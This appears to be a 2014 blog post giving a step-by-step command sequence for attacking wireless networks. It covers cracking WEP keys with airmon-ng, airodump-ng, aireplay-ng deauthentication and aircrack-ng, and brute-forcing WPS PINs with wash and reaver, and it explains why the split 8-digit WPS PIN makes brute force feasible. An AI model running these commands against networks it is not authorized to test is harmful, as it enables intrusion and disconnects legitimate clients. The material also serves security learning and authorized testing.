Wireless Attacks

By | 17/08/2014


WEP – Wired Equivalent Privacy

Uses a weak version of RC4

WEP key by Brute Force

Put the card in monitoring mode

airmon-ng start wlan0

Get a list of reachable wireless

airodump-ng mon0

Capture packets

airodump-ng –w [filename] –c [channel] --bssid [bssid] mon0

Generate additional data

aireplay-ng -0 0 -a [bssid] mon0

Brute force the captured packets to obtain the WEP key

aircrack-ng mtnl-org-01.cap




WPS Attack

Typically WEP and WPA wireless networks are vulnerable to a series of attacks that allow an attacker to get the encryption key after capturing lots of traffic. There is another method, using WPS protocol, that also allows to obtain the encryption key for the WPA wireless and also for the WPA2 wireless networks.

WPS (Wi-fi Protected Setup) allows the automatic configuration of the wireless network in a device, just using a PIN number or pressing a button in the Wireless AP. The PIN consists of 8 digits that should be able to avoid brute force attacks if the protocol is well implemented with delays after 3 failed attempts. The flaw of the protocol is that the PIN is divided in two blocks of 4 digits in a way that an attacker can try first the first 4 digits and then the other 4 digits. This allow a brute force attack to be possible in less than a day.



WPS – False Prophet


Reaver is a tool that performs brute force attack to Wireless routers. The tool is available in Kali distribution and it will require a few some other tools to perform previous steps.

Obtain the wlan interface (wlan0 or wlan1)


Activate monitor mode and obtain the monitor interface (typically mon0)

airmon-ng start wlan0

Find the BSS of the router

airodump-ng mon0

Check if WPS is locked or not

wash -i mon0 [--ignore-fcs]

Run reaver to start a brute force attack to the BSSID

reaver -i mon0 -b [bssid] -vv







  • Deauth client
  • Capture EAPOL handshake
  • WPA / WPA2 dictionary attack